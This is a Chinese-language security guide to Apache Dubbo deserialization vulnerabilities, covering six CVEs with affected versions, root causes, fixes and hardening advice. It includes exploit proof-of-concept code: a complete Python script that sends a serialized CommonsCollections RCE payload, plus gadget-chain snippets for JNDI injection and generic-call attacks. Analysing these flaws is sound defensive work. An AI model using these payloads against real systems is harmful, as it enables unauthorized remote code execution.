Apache Dubbo 安全漏洞分析与防护指南<\/h1>

1. Dubbo 基础架构<\/h2>

Apache Dubbo 是一款高性能的 Java RPC 框架，采用分布式服务架构，主要包含以下核心组件：<\/p>

Container<\/strong>：服务运行的容器<\/li>
Provider<\/strong>：RPC 服务提供方<\/li>
Registry<\/strong>：注册中心（如 Zookeeper）<\/li>
Consumer<\/strong>：RPC 服务消费者<\/li>

Monitor<\/strong>：监控中心<\/li> <\/ul>
通信流程<\/strong>：<\/p>

容器启动并提供 RPC 服务<\/li>
Provider 向注册中心注册服务<\/li>
Consumer 向注册中心订阅所需服务<\/li>
注册中心返回 Provider 地址列表给 Consumer<\/li>
Consumer 基于负载均衡算法选择 Provider 进行调用<\/li>
调用统计信息定时发送到监控中心<\/li> <\/ol>
2. Dubbo 安全漏洞分析<\/h2>
2.1 CVE-2019-17564 - HTTP 协议反序列化漏洞<\/h3>
漏洞描述<\/strong>：
Dubbo 使用 HTTP 协议通信时直接使用 Spring 的 HttpInvokerServiceExporter<\/code> 类处理远程调用，未对 POST 请求的 Body 内容进行安全检查，导致反序列化漏洞。<\/p>
影响版本<\/strong>：所有使用 HTTP 协议的 Dubbo 版本<\/p>
漏洞原理<\/strong>：<\/p>
攻击者可构造恶意的 Java 序列化数据<\/li> Content-Type 设置为 application\/x-java-serialized-object<\/code><\/li> 服务端反序列化时触发 RCE<\/li> <\/ul> PoC<\/strong>：<\/p> import<\/span> requests <\/span><\/span>import<\/span> base64 <\/span><\/span> <\/span><\/span>url =<\/span> "http:\/\/target:8081\/org.apache.dubbo.samples.http.api.DemoService"<\/span> <\/span><\/span>payload =<\/span> "rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI\/QAAAAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAA2Zvb3NyACpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMubWFwLkxhenlNYXBu5ZSCnnkQlAMAAUwAB2ZhY3Rvcnl0ACxMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5DaGFpbmVkVHJhbnNmb3JtZXIwx5fsKHqXBAIAAVsADWlUcmFuc2Zvcm1lcnN0AC1bTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHVyAC1bTG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5UcmFuc2Zvcm1lcju9Virx2DQYmQIAAHhwAAAABXNyADtvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ29uc3RhbnRUcmFuc2Zvcm1lclh2kBFBArGUAgABTAAJaUNvbnN0YW50cQB+AAN4cHZyABFqYXZhLmxhbmcuUnVudGltZQAAAAAAAAAAAAAAeHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkludm9rZXJUcmFuc2Zvcm1lcofo\/2t7fM44AgADWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAALaU1ldGhvZE5hbWV0ABJMamF2YS9sYW5nL1N0cmluZztbAAtpUGFyYW1UeXBlc3QAEltMamF2YS9sYW5nL0NsYXNzO3hwdXIAE1tMamF2YS5sYW5nLk9iamVjdDuQzlifEHMpbAIAAHhwAAAAAnQACmdldFJ1bnRpbWV1cgASW0xqYXZhLmxhbmcuQ2xhc3M7qxbXrsvNWpkCAAB4cAAAAAB0AAlnZXRNZXRob2R1cQB+ABsAAAACdnIAEGphdmEubGFuZy5TdHJpbmeg8KQ4ejuzQgIAAHhwdnEAfgAbc3EAfgATdXEAfgAYAAAAAnB1cQB+ABgAAAAAdAAGaW52b2tldXEAfgAbAAAAAnZyABBqYXZhLmxhbmcuT2JqZWN0AAAAAAAAAAAAAAB4cHZxAH4AGHNxAH4AE3VyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0AARjYWxjdAAEZXhlY3VxAH4AGwAAAAFxAH4AIHNxAH4AD3NyABFqYXZhLmxhbmcuSW50ZWdlchLioKT3gYc4AgABSQAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAABc3IAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA\/QAAAAAAAAHcIAAAAEAAAAAB4eHg="<\/span> <\/span><\/span>payload =<\/span> base64.<\/span>b64decode(payload) <\/span><\/span>headers =<\/span> {"Content-Type"<\/span>: "application\/x-java-serialized-object"<\/span>} <\/span><\/span>res =<\/span> requests.<\/span>post(url, headers=<\/span>headers, data=<\/span>payload) <\/span><\/span>print(res.<\/span>text) <\/span><\/span><\/code><\/pre>修复方案<\/strong>：<\/p> 不再使用 HttpInvokerServiceExporter<\/code><\/li> 改用 com.googlecode.jsonrpc4j.JsonRpcServer<\/code> 处理 HTTP 请求<\/li> 数据传输使用 JSON 格式<\/li> <\/ul> 2.2 CVE-2020-1948 - Dubbo 协议 Hessian 反序列化漏洞<\/h3> 漏洞描述<\/strong>： Dubbo 默认协议使用 Hessian 序列化，攻击者可构造恶意序列化数据，通过 RPC 调用触发反序列化漏洞。<\/p> 影响版本<\/strong>：<\/p> 2.7.0 <= Dubbo <= 2.7.6<\/li> 2.6.0 <= Dubbo <= 2.6.7<\/li> 所有 2.5.x 版本<\/li> <\/ul> 漏洞原理<\/strong>：<\/p> Dubbo 协议默认使用 Hessian2 序列化<\/li> 攻击者可修改 TCP 包中的方法参数<\/li> 反序列化时先通过构造方法实例化，再反射设置字段值<\/li> 利用 Rome 库的 ToStringBean<\/code> 和 EqualsBean<\/code> 触发 JNDI 注入<\/li> <\/ul> PoC 关键代码<\/strong>：<\/p> JdbcRowSetImpl rs =<\/span> new<\/span> JdbcRowSetImpl();<\/span> <\/span><\/span>rs.<\/span>setDataSourceName<\/span>(<\/span>"ldap:\/\/127.0.0.1:8087\/xxx"<\/span>);<\/span> <\/span><\/span>ToStringBean item =<\/span> new<\/span> ToStringBean(<\/span>JdbcRowSetImpl.<\/span>class<\/span>,<\/span> rs);<\/span> <\/span><\/span>EqualsBean root =<\/span> new<\/span> EqualsBean(<\/span>ToStringBean.<\/span>class<\/span>,<\/span> item);<\/span> <\/span><\/span>HashMap s =<\/span> new<\/span> HashMap<>();<\/span> <\/span><\/span>Reflections.<\/span>setFieldValue<\/span>(<\/span>s,<\/span> "size"<\/span>,<\/span> 2<\/span>);<\/span> <\/span><\/span>\/\/ 构造恶意HashMap并序列化 <\/span><\/span><\/span><\/code><\/pre>修复方案<\/strong>：<\/p> 在 DecodeableRpcInvocation.decode()<\/code> 方法中添加参数类型验证<\/li> 防止伪造参数类型<\/li> <\/ul> 2.3 CVE-2020-11995 - CVE-2020-1948 绕过<\/h3> 漏洞描述<\/strong>：通过修改方法名为泛型调用方法($invoke<\/code>、$invokeAsync<\/code>、$echo<\/code>)绕过 CVE-2020-1948 的补丁。<\/p> 影响版本<\/strong>：<\/p> 2.7.0 ~ 2.7.8<\/li> 2.6.0 ~ 2.6.8<\/li> 所有 2.5.x 版本<\/li> <\/ul> 修复方案<\/strong>：<\/p> 在泛型调用时强制指定参数类型<\/li> <\/ul> 2.4 CVE-2021-25641 - Kryo\/FST 反序列化漏洞<\/h3> 漏洞描述<\/strong>：当 Dubbo 使用 Kryo 或 FST 序列化时，攻击者可构造恶意序列化数据触发反序列化漏洞。<\/p> 影响版本<\/strong>：<\/p> dubbo-common <= 2.7.3<\/li> 2.7.0 ~ 2.7.8<\/li> 2.6.0 ~ 2.6.9<\/li> 所有 2.5.x 版本<\/li> <\/ul> 漏洞原理<\/strong>：<\/p> 修改 Dubbo 协议头中的序列化方式位(8-Kryo, 9-FST)<\/li> 利用 Fastjson 的 JSONObject.toString()<\/code> 触发绑定对象的 getter 方法<\/li> 结合 TemplatesImpl<\/code> 实现 RCE<\/li> <\/ul> PoC 关键代码<\/strong>：<\/p> \/\/ 设置序列化方式为FST(9)或Kryo(8) <\/span><\/span><\/span><\/span>header[<\/span>2<\/span>]<\/span> =<\/span> (<\/span>byte<\/span>)((<\/span>byte<\/span>)<\/span>0x80<\/span> |<\/span> (<\/span>byte<\/span>)<\/span>9<\/span> |<\/span> (<\/span>byte<\/span>)<\/span>0x40<\/span>);<\/span> <\/span><\/span> <\/span><\/span>\/\/ 构造Fastjson Gadget Chain <\/span><\/span><\/span><\/span>JSONObject jo =<\/span> new<\/span> JSONObject();<\/span> <\/span><\/span>jo.<\/span>put<\/span>(<\/span>"oops"<\/span>,<\/span> templates);<\/span> \/\/ templates为恶意TemplatesImpl对象 <\/span><\/span><\/span><\/code><\/pre>修复方案<\/strong>：<\/p> dubbo-common 2.7.4+ 移除了 Kryo 和 FST 的默认支持<\/li> 需要显式引入相关依赖<\/li> <\/ul> 2.5 CVE-2021-30179 - 泛型调用反序列化漏洞<\/h3> 漏洞描述<\/strong>：通过 Dubbo 的泛型调用特性，利用三种不同的反序列化方式(raw.return、bean、nativejava)实现 RCE。<\/p> 影响版本<\/strong>：<\/p> 2.7.0 ~ 2.7.9<\/li> 2.6.0 ~ 2.6.9<\/li> 所有 2.5.x 版本<\/li> <\/ul> 三种攻击方式<\/strong>：<\/p> raw.return<\/strong>：<\/li> <\/ol> \/\/ 使用JndiConverter触发JNDI注入 <\/span><\/span><\/span><\/span>HashMap jndi =<\/span> new<\/span> HashMap();<\/span> <\/span><\/span>jndi.<\/span>put<\/span>(<\/span>"class"<\/span>,<\/span> "org.apache.xbean.propertyeditor.JndiConverter"<\/span>);<\/span> <\/span><\/span>jndi.<\/span>put<\/span>(<\/span>"asText"<\/span>,<\/span> JNDI_URL);<\/span> <\/span><\/span>out.<\/span>writeObject<\/span>(<\/span>new<\/span> Object[]{<\/span>jndi});<\/span> <\/span><\/span> <\/span><\/span>\/\/ 设置generic为raw.return <\/span><\/span><\/span><\/span>map.<\/span>put<\/span>(<\/span>"generic"<\/span>,<\/span> "raw.return"<\/span>);<\/span> <\/span><\/span><\/code><\/pre> bean<\/strong>：<\/li> <\/ol> \/\/ 使用JavaBeanDescriptor封装JdbcRowSetImpl <\/span><\/span><\/span><\/span>JavaBeanDescriptor descriptor =<\/span> new<\/span> JavaBeanDescriptor(<\/span>"com.sun.rowset.JdbcRowSetImpl"<\/span>,<\/span> 7<\/span>);<\/span> <\/span><\/span>descriptor.<\/span>setProperty<\/span>(<\/span>"dataSourceName"<\/span>,<\/span> JNDI_URL);<\/span> <\/span><\/span>descriptor.<\/span>setProperty<\/span>(<\/span>"autoCommit"<\/span>,<\/span> true<\/span>);<\/span> <\/span><\/span>out.<\/span>writeObject<\/span>(<\/span>new<\/span> Object[]{<\/span>descriptor});<\/span> <\/span><\/span> <\/span><\/span>\/\/ 设置generic为bean <\/span><\/span><\/span><\/span>map.<\/span>put<\/span>(<\/span>"generic"<\/span>,<\/span> "bean"<\/span>);<\/span> <\/span><\/span><\/code><\/pre> nativejava<\/strong>：<\/li> <\/ol> \/\/ 使用原生Java反序列化 <\/span><\/span><\/span><\/span>byte<\/span>[]<\/span> payload =<\/span> Serializer.<\/span>serialize<\/span>(<\/span>ObjectPayload.<\/span>Utils<\/span>.<\/span>makePayloadObject<\/span>(<\/span>"CommonsCollections6"<\/span>,<\/span> "calc"<\/span>));<\/span> <\/span><\/span>out.<\/span>writeObject<\/span>(<\/span>new<\/span> Object[]{<\/span>payload});<\/span> <\/span><\/span> <\/span><\/span>\/\/ 设置generic为nativejava <\/span><\/span><\/span><\/span>map.<\/span>put<\/span>(<\/span>"generic"<\/span>,<\/span> "nativejava"<\/span>);<\/span> <\/span><\/span><\/code><\/pre>修复方案<\/strong>：<\/p> 在类加载前加入黑名单验证<\/li> 默认禁用 Java 原生反序列化<\/li> <\/ul> 2.6 CVE-2021-43279 - Hessian 异常处理漏洞<\/h3> 漏洞描述<\/strong>： Hessian 序列化在处理异常时隐式调用对象的 toString()<\/code> 方法，导致任意代码执行。<\/p> 影响版本<\/strong>：<\/p> 2.6.x < 2.6.12<\/li> 2.7.x < 2.7.15<\/li> 3.0.x < 3.0.5<\/li> <\/ul> 修复方案<\/strong>：<\/p> 移除隐式的 toString()<\/code> 调用<\/li> 修复 Hessian2Input.expect()<\/code> 方法<\/li> <\/ul> 3. 防护建议<\/h2> 及时升级<\/strong>：<\/p> 使用 Dubbo 最新稳定版本<\/li> 定期关注安全公告<\/li> <\/ul> <\/li> 协议安全<\/strong>：<\/p> 避免使用 HTTP 协议<\/li> 如必须使用 HTTP，禁用 httpinvoker<\/code><\/li> <\/ul> <\/li> 序列化安全<\/strong>：<\/p> 使用最新版 Hessian<\/li> 谨慎使用 Kryo\/FST 序列化<\/li> 配置序列化黑白名单<\/li> <\/ul> <\/li> 网络防护<\/strong>：<\/p> 限制 Dubbo 服务端口访问<\/li> 使用防火墙规则保护注册中心<\/li> <\/ul> <\/li> 其他措施<\/strong>：<\/p> 启用 Dubbo 的访问控制<\/li> 监控异常 RPC 调用<\/li> 定期安全审计<\/li> <\/ul> <\/li> <\/ol> 4. 总结<\/h2> Dubbo 作为广泛使用的 RPC 框架，其安全性至关重要。本文分析的漏洞主要涉及：<\/p> 不安全的反序列化实现<\/li> 协议设计缺陷<\/li> 泛型调用滥用<\/li> 异常处理不当<\/li> <\/ol> 防护关键在于：<\/p> 及时更新补丁<\/li> 严格限制序列化操作<\/li> 最小化网络暴露面<\/li> 实施深度防御策略<\/li> <\/ul>